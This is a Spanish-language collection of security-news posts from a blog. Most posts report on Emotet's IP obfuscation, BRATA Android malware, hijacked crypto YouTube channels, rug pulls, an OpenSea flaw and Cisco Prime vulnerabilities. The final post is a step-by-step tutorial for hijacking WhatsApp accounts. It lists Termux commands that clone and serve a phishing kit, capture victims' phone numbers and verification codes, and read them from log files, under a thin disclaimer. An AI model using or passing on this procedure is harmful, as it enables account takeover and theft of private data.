Especialistas en ciberseguridad de Trend Micro reportan la detección de una campaña de spam dedicada al despliegue del troyano bancario Emotet en la que los actores de amenazas usan representaciones hexadecimales y octales de direcciones IP con el fin de evadir la detección mediante una táctica conocida como coincidencia de patrones.

Estas rutas también recurren a técnicas de ingeniería social para engañar a los usuarios para que habiliten macros de documentos y automaticen la ejecución de malware. Al recibir estos estándares, los sistemas operativos convierten automáticamente los valores a la representación cuádruple decimal para iniciar la solicitud desde los servidores remotos. El objetivo principal de esta campaña parece ser la entrega de otras variantes de malware como TrickBot y Cobalt Strike.

Las muestras detectadas por los expertos residían en un archivo adjunto a un email usando macros Excel 4.0, una función empleada para automatizar algunas tareas repetitivas en Excel que los cibercriminales han abusado para entregar malware anteriormente. El abuso de esta función permitió que el malware se ejecutara una vez que se abre el documento usando la macro auto_open.

La URL está ofuscada con signos de intercalación y el host contiene una representación hexadecimal de la dirección IP. Los investigadores pudieron convertir los números hexadecimales para encontrar el equivalente decimal con puntos más comúnmente usado, 193.42.36.245.

Una vez ejecutada, la macro invoca cmd.exe>mshta.exe con la URL que contiene la representación hexadecimal de la dirección IP como argumento, descargando y ejecutando un código de aplicación HTML desde el host remoto.

Del mismo modo que la representación hexadecimal, el documento también usa macros de Excel 4.0 para la ejecución del malware al abrir el documento. La URL también está ofuscada con signos de intercalación, pero la IP contiene una representación octal

Esta campaña ha estado activa desde noviembre de 2021, aunque desde hace un par de semanas los investigadores notaron un pico de actividad muy alto, por lo que depender de las soluciones de seguridad basadas en la detección de patrones podría ser un enfoque poco recomendable en términos de ciberseguridad.

Los expertos de Trend Micro recomiendan a los administradores de sistemas aplicar las medidas necesarias para detectar y bloquear este vector de ataque antes de que se completen los ataques.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Estas direcciones IP hexadecimales y octales pueden evadir los mecanismos antimalware. Bloquee para evitar ser hackeado por el malware Emotet apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Este malware de Android elimina todos los datos del teléfono después de robar su dinero e información

No es para nadie un secreto que los grupos de actores de amenazas más peligrosos del mundo siempre están tratando de evolucionar, realizando importantes inversiones para el desarrollo de complejas variantes de malware y el despliegue de campañas de ingeniería social, por lo que es complicado mantenerse siempre protegidos de los ciberataques contra sistemas informáticos, incluyendo los smartphones.

Un reciente reporte de McAfee señala la detección de una campaña maliciosa identificada como Brazilian Remote Access Tool Android (BRATA), que combina una avanzada variante de malware y la ingeniería social para infectar miles de dispositivos, además de recibir mantenimiento constante de sus desarrolladores.

Como su nombre sugiere, esta variante de malware se dirigía específicamente a usuarios de Android en Brasil empleando apps maliciosas disponibles en Google Play, aunque en recientes tiempos se ha detectado atacando a usuarios en Estados Unidos y España. La carga maliciosa se oculta en una supuesta app de escáner de seguridad que, al ser instalada, pedía a los usuarios instalar actualizaciones críticas para otras aplicaciones en el sistema, como WhatsApp, Chrome o lectores PDF inexistentes en el sistema objetivo.

Si el usuario objetivo cae en la trampa, se completa la infección y comienza a recolectar información del sistema objetivo, tomando capturas de pantalla e interceptando contraseñas, patrones, registros del teclado e incluso grabando la pantalla del dispositivo afectado, realizando un monitoreo detallado del usuario comprometido. Entre las principales características de BRATA destacan:

  • Ocultar y mostrar las llamadas entrantes, reduciendo el volumen del dispositivo a cero y oscureciendo al máximo la pantalla
  • Concesión de permisos en el sistema sin conocimiento del usuario
  • Desactivación de Google Play Store y Google Play Protect
  • Autodestrucción

Por si esto no fuese suficiente, la más reciente actualización de esta campaña contiene nuevas funciones, como capacidades de phishing, malware y troyanos bancarios que convierten a BRATA en una de las más peligrosas amenazas de seguridad actualmente. En un caso recientemente detectado, el malware pudo mostrar al usuario afectado direcciones falsas URLs de instituciones financieras, lo que facilitó el robo de información bancaria confidencial de la víctima.

McAfee señala que los métodos de ingeniería social siguen funcionando ya que se aprovechan del hecho que las personas confían en las instituciones bancarias. En los ataques de phishing exitosos, las personas entregan las claves a los ciberdelincuentes en lugar de que los ciberdelincuentes tengan que robarlas ellos mismos.

Para prevenir esta clase de infecciones, los expertos recomiendan a los usuarios de Android nunca instalar aplicaciones desde fuentes no oficiales, ya que este es el principal método empleado por los cibercriminales para entregar malware en dispositivos móviles. Sobre las apps maliciosas que logran colarse en Google Play, los especialistas recomiendan verificar la información de los desarrolladores antes de instalar la herramienta en cuestión.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).  

El cargo Este malware de Android elimina todos los datos del teléfono después de robar su dinero e información apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Docenas de cripto youtubers han visto sus cuentas secuestradas por hackers para promover una nueva estafa

Un grupo de hackers logró comprometer varios canales de YouTube especializados en criptomoneda en algún momento durante la tarde del domingo. Las cuentas publicaron videos no autorizados con un texto invitando a los visitantes a realizar transacciones a una billetera electrónica controlada por los hackers; entre las cuentas afectadas destacan BitBoy Crypto, Altcoin Buzz, Boxmining, Ivan on Tech y The Moon, entre otras.

Especialistas de Cointelegraph rastrearon la billetera Binance Smart Chain publicada en estos videos y descubrieron que solo registraba nueve transacciones usando la criptomoneda BNB con valor total de $850 USD. Otros usuarios, como el propietario del canal Boxmining, aseguran que pudieron notar la actividad maliciosa antes de que los videos fueran publicados en sus canales.

Sobre las posibles explicaciones se han mencionado múltiples hipótesis, desde una campaña de hacking masiva hasta aquellos que atribuyen la responsabilidad a YouTube. A través de Reddit, un usuario identificado como “9Oh8m8” asegura que un hacker accedió a las cuentas afectadas empleando la variante de fraude conocida como intercambio de SIM (también conocida como SIM swap).

Michael Gu, propietario de Boxmining, no está convencido de esta teoría, ya que no ha detectado indicadores de compromiso relacionados con esta clase de estafa: “Si fuera un ataque SIM swap, habría perdido acceso a mi smartphone y cuenta de Google, lo cual no pasó”, agrega.

Finalmente, Shash Gupta, fundador y director ejecutivo del canal Altcoin Buzz agregó que su equipo notó algo inusual el domingo por la mañana; poco después, el video había sido publicado: “No tenemos muy claro qué ha pasado, aunque ya estamos en contacto con YouTube para evitar más infracciones en el futuro”, concluye.

Aunque el incidente es claramente parte de un intento masivo de estafa, aún no se sabe quién está detrás del ataque y cómo ha conseguido tanto alcance. La buena noticia es que los actores de amenazas apenas han conseguido unos cuantos cientos de dólares enviados a su dirección de criptomoneda; aún así, se espera que YouTube pueda aclarar la situación en breve.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Docenas de cripto youtubers han visto sus cuentas secuestradas por hackers para promover una nueva estafa apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

lunes, 24 de enero de 2022

Descubren nuevo ataque “RUG PULL” basado en contratos inteligentes de criptomonedas

Especialistas en ciberseguridad reportan un grupo de hackers logró abusar de algunas configuraciones incorrectas en contratos inteligentes con el fin de desplegar estafas de salida (RUG PULL) contra usuarios de criptomoneda, aprovechando que los activos virtuales y tokens no fungibles (NFT) están en un momento de popularidad muy alta.

Esta semana, los investigadores de Check Point reportaron que diversos grupos de estafadores están dirigiendo su atención a los contratos inteligentes con configuraciones incorrectas, emitiendo múltiples criptomonedas nuevas para venderlas y después desaparecer con el dinero de los inversores.

Un ejemplo reciente es el token SQUID, que poco después de su lanzamiento y gracias a una ambiciosa campaña publicitaria llegó a valer más de $2,800 USD. Cuando los estafadores concretaron el fraude, el precio de este token cayó en 99%, quedando prácticamente sin valor alguno.

Los estafadores recurren a toda clase de trucos para llevar a cabo una estafa de salida, incluyendo el uso de servicios fraudulentos para la creación de contratos inteligentes y la manipulación de funciones para impedir que los inversores vendan estos tokens una vez que han ingresado dinero a los proyectos. No obstante, el principal elemento de estas estafas es el acelerado incremento en el valor de estos tokens, impulsado por grandes campañas de marketing digital.

Otro ejemplo de posibles mecanismos de estafa es una función oculta que permite a los desarrolladores crear más monedas o controlar quién puede vender tokens. En el código fuente de un contrato inteligente recientemente detectado, el equipo encontró una función de transferencia que impedía la reventa por parte de los comerciantes promedio, una táctica similar a la utilizada por los estafadores de SQUID.

Este mismo contrato inteligente contenía una función oculta que permitía a los actores de amenazas explotar la acuñación de monedas después de que la clave privada del contrato se filtrara accidentalmente en línea. Los cibercriminales pudieron usar la clave para acuñar de manera fraudulenta millones de monedas virtuales antes de retirarlas.

Durante 2021, el fraude electrónico generó pérdidas por casi $14 mil millones USD, por lo que los especialistas creen que esta tendencia seguirá avanzando a lo largo de 2022.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Descubren nuevo ataque “RUG PULL” basado en contratos inteligentes de criptomonedas apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

Vulnerabilidad crítica en plataforma NFT OpenSea permitió a los hackers robar millones de dólares

Especialistas en ciberseguridad reportan que se ha encontrado una forma de explotar el front-end de OpenSea, la plataforma de venta de tokens no fungibles (NFT) más popular del momento. Al parecer, el propósito de los actores de amenazas es atacar a los poseedores de la popular colección Bored Ape Yatch Club.

Este incidente fue reportado por la firma de seguridad PeckShield, que cuenta con un sistema de alertas automatizadas para la detección de amenazas de seguridad. Según el informe, el ataque generó pérdidas por unos $750,000 USD en Ethereum, aunque la cifra podría variar.

En un informe separado, un usuario reveló que la falla habría permitido comprar tokens a precios menores, registrados en OpenSea hace algunas semanas o meses. Este reporte también señala que el ataque se dirige específicamente a los propietarios de NFTs Bored Ape.

El usuario menciona que un error anterior habría afectado a los usuarios de OpenSea, que eran cargados con comisiones cuando deseaban retirar un NFT del listado de productos a la venta. Dado que este es un gasto que los vendedores no deseaban hacer, descubrieron que la solución era transferir el NFT a otra billetera, cancelando así la compra.

Esto complicó las cosas debido a que el elemento no muestra la lista en el sistema operativo, pero, de hecho, todavía está activo a través de la API del sistema operativo. La forma más rápida de ver estos listados antiguos es en Rarible, que utiliza la API del sistema operativo para mostrar y cumplir con los listados del sistema operativo.

OpenSea ya está al tanto de estos reportes y se ha solicitado su postura al respecto. No obstante, hasta el momento de redacción de este artículo la compañía no había emitido un mensaje oficial.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Vulnerabilidad crítica en plataforma NFT OpenSea permitió a los hackers robar millones de dólares apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

2 vulnerabilidades críticas descubiertas en servidores Cisco Prime

La interfaz web de Cisco Prime se ve afectada por un par de fallas de seguridad cuya explotación exitosa permitiría a los actores de amenazas desplegar ataques de ejecución remota de código (RCE). Esta es una solución de gestión de redes que permite realizar tareas de supervisión, optimización y resolución de problemas en dispositivos inalámbricos y cableados.

El investigador Andreas Finstad, a cargo del reporte menciona que al ser encadenadas, estas fallas podrían comprometer completamente el servidor Prime y proporcionar al atacante un shell inverso. Al parecer, las fallas existen debido a un vector de scripts entre sitios (XSS) que se explota a través de SNMP, protocolo utilizado para descubrir dispositivos en una red.

Acorde al reporte, Cisco Prime envía solicitudes SNMP para la recopilación de información sobre dispositivos de red en la misma red, entre lo que se incluye la dirección de un archivo de imagen. Finstad colcó un dispositivo basado en Linux en la red y estableció la dirección de imagen en un fragmento JavaScript malicioso alojado en un servidor controlado por el investigador, actuando como atacante. Cuando el servidor del usuario afectado navega a la página de descubrimiento de dispositivos de Prime, el script malicioso se carga y ejecuta en el navegador, resultando en un ataque XSS.

Abusando de esta característica, el investigador pudo explotar otras vulnerabilidades de forma encadenada, comenzando por explotar una falla de cookie de identificación de sesión almacenada en LocalStorage, permitiendo acceder a la sesión activa del administrador afectado.

Usando el token de administrador robado, el investigador también trató de enviar comandos a la interfaz de administración de Prime. Como la mayoría de las aplicaciones web, la interfaz de administración de Prime evita tales comandos, aunque el abuso de una función para la generación de tokens eventualmente permitió evadir las protecciones contra la falsificación de solicitudes entre sitios (CSRF).

Este informe señala la frecuencia con la que pueden encontrarse vulnerabilidades similares en la protección de aplicaciones web: “Desde una perspectiva de seguridad, el navegador no está bajo control del cliente, por lo que es mejor verificar la seguridad del lado del usuario”, menciona el experto.

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo 2 vulnerabilidades críticas descubiertas en servidores Cisco Prime apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente

sábado, 22 de enero de 2022

Cómo hackear WhatsApp fácilmente con un sitio web de phishing en Termux muy efectivo

El phishing es una de las principales amenazas de ciberseguridad en la actualidad, ya que prácticamente cualquier persona en el mundo usa smartphones, cuentas en línea y otras herramientas a pesar de no contar con nociones básicas de seguridad informática y riesgos de seguridad, afirman especialistas en hacking ético.

Una tendencia creciente dentro del phishing es el compromiso de cuentas de WhatsApp, la mayor plataforma de mensajería instantánea en el mundo. Los actores de amenazas aprovechan que se requieren mínimos recursos para el despliegue de una campaña de phishing contra usuarios de la aplicación, empleando herramientas disponibles en cualquier foro de dudosa reputación.

En esta ocasión, los expertos en hacking ético del Instituto Internacional de Seguridad Cibernética (IICS) le mostrarán un ataque de phishing simple para atacar cuentas de WhatsApp, empleando apenas unos cuantos comandos. Como de costumbre, le recordamos que este artículo fue elaborado con fines exclusivamente informativos y no debe ser tomado como un llamado a la acción; IICS no es responsable del mal uso que pueda darse a la información aquí contenida.

Este ataque se basa en Termux, el popular emulador de terminal para  dispositivos Android que permite ejecutar un entorno Linux en un smartphone con requerimientos específicos. Una vez que hemos instalado Termux, deberemos abrir la herramienta y escribir los siguientes comandos uno por uno (ingresar “y” cuando el sistema pida elegir entre Y/N):

apt update
apt upgrade
apt install git
git clone https://github.com/Ignitetch/Whatsapp-phishing
apt install php
cd Whatsapp-phishing
php -S localhost:8080 

A continuación, los expertos en hacking ético recomiendan escribir en el navegador el siguiente comando:

http://localhost:8080

La víctima ingresa un número, por ejemplo:

+74959999999

En el siguiente paso, elija Iniciar Sesión:

Ahora debemos ingresar el código recibido en el número de teléfono, por ejemplo 12345678

Después de entrar redirige al usuario a web.whatsapp.com:

Regrese al terminal, mencionan los expertos en hacking ético:

Deslice hacia la derecha y en la ventana que aparece a continuación, pulse New Session

En este menú, escriba el siguiente comando:

cat log.txt && cat logs.txt

En respuesta, recibiremos datos de la víctima:

Para conocer más sobre riesgos de seguridad informática, malware, vulnerabilidades y tecnologías de la información, no dude en ingresar al sitio web del Instituto Internacional de Seguridad Cibernética (IICS).

El cargo Cómo hackear WhatsApp fácilmente con un sitio web de phishing en Termux muy efectivo apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.



Ver Fuente